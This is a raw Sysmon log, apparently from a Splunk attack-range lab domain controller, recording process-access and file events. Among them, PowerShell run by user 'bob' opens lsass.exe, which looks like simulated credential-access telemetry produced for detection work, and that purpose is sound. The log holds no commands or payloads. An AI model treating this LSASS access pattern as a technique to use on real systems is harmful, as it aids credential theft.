08:09:02.757{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001055184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.757{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7571276F24270357AA93A118EC7D9B7,SHA256=376BCCB50A3C144A43880D68A81C04B02E1253F62869C05E391E5405A9AB8E80,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001055182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:09:02.726{466BC892-F89E-60EB-077E-00000000CF01}3804\PSHost.132705509422478310.3804.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001055181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.710{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8AA5773405E2C79BC294B733F53B8B22,SHA256=1A49FD066865B6EAD7312E4EB6DB983D7A51814DCB47F2FCECFD26805CAB9900,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.695{466BC892-F89E-60EB-077E-00000000CF01}3804ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_luqk1trn.feu.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.695{466BC892-F89E-60EB-077E-00000000CF01}3804ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_ykodwyjv.sv5.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.657{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_ykodwyjv.sv5.ps12021-07-12 08:09:02.657 10341000x80000000000000001055177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.626{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+517
81 10341000x80000000000000001055173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}3804ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf78a904.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.557{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.510{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.510{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.473{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.473{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.473{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.458{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.442{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001055154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 